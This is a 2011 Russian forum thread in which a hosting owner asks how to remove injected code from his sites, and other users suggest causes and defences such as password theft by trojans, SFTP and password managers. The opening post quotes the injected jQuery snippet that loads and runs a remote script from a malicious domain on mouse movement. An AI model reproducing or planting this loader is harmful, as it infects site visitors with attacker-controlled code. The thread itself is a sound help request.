Форум для программистов - задавайте интересные вопросы - получайте квалифицированные ответы
на сайт пробрался вирус. как с ним справиться?
  • muromecmuromec June 2011
    я создал хостинг. на нем несколько сайтиков. на друпале и на самописных CMS. на днях заметил, что несколько из них не работает. пальнул index.php. обнаружил, что в конце дописан следуующий код:

    _script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js">
    _script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('__firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});
    залез в директории всех сайтов. оказалось, что такой код присутствует во всех файлах .js и index.php.
    я, конечно, попытался удалить этот код, но он опять возвращается на старое место.
    достп у меня только к Директ админ и ФТП. к ssh достпа нет. в чем дело, как думаете?
  • mozgmozg June 2011
    эта проблема довольно часто встречается. и связано это, как правило с тем, что на компе у вас Троян. он всегда ворует пороль и дальше приписывает еще свой код. посоетую для начала пароль поменять Директадмин на фтп акаунты. затем к техподдержке хостера нужно обратиться. они скорее всего почистят все своими скриптами. им подобные вопросы приходится обрабатывать почти каждый день. и для этого они уже давно самописные скрипты разработали.
  • cationcation June 2011
    первый раз с таким сталкиваюсь.... и в jQuery уже догадались коды вредоносные вписывать. раньше то все iframe баловались. реально, сначала у себя дырку подлечите. еще можно попробовать удалить все письма с доступами из почты своей. я помню, как то прям волна таких нападений была. производители все просто напросто строенными антивирусами обзавелись.
  • muromecmuromec June 2011
    спасибо большое. приму к сведению.
  • dollydolly June 2011
    дело может быть не в машинке. вполне возможно, что там дыра в самом скрипте. :-D
  • dozdikdozdik June 2011
    когда пользуетесь FTP, постарайтесь не пользоваться Far и Total Commander. аккаунты оттуда вынимаются. FlashFXP - отлично шифрет пароли. его бы я и посоветовал. возможно даже есть бесплатные аналоги.
  • mozgmozg June 2011
    вообще-то и для FlashFXP пароли можно дешифровать!
  • dozdikdozdik June 2011
    помню, разработчик FlashFXP говорил мне на форуме, что на дешифровку AES уйдут годы. а так то действительно дешифровать можно почти все, если ресурсы соответствующие имеются.
  • dollydolly June 2011
    давно уже это есть. вот посмотри: static.rbytes.net/fullsize_screenshots/f/l/flashfxp-password-decryption.jpg
  • dozdikdozdik June 2011
    вы, кажется, не допоняли. программа такая нешифрованные аккаунты вытаскивает. если поставите пароль FlashFXP, то получите AES-шифрование. программа то тогда бесполезной окажется!
  • dozdikdozdik June 2011
    точнее даже не так выразился. аккаунты в FlashFXP по умолчанию не шифруются, потому что они должны быть приведены к исходному виду перед использованием. осуществить это можно только за счет ключа. у FlashFXP имеется функция шифрования аккантов при помощи паролья-ключа. их необходимо вводить при запуске ;-)
  • sorvanecsorvanec June 2011
    все подобные шифровки отлавливаются отлично на уровне прокси для трафика. давно уже существуют таие трояны, которые драйвером цеплялись и сниффели траффик.
  • acidlynxacidlynx June 2011
    Ага.. И лазить всегда через sftp (для винды есть отличная прога - WinSCP). А пароли хранить в каком-нибудь менеджере паролей (KeePass, например). Ну и иметь здоровую меру паранойи - с неизвестных компов не лазить, в интернет-зале не обновлять и т.п.
Добавить комментарий

Добро пожаловать!

Похоже, что Вы здесь впервые. Если хотите поучаствовать, нажмите на одну из этих кнопок!

Sign In with Twitter Sign In with OpenID Sign In with Google Login with Facebook

Войти Зарегистрироваться

Категории

In this Discussion

Webparadox - разработка мобильных приложений под iOS и Android.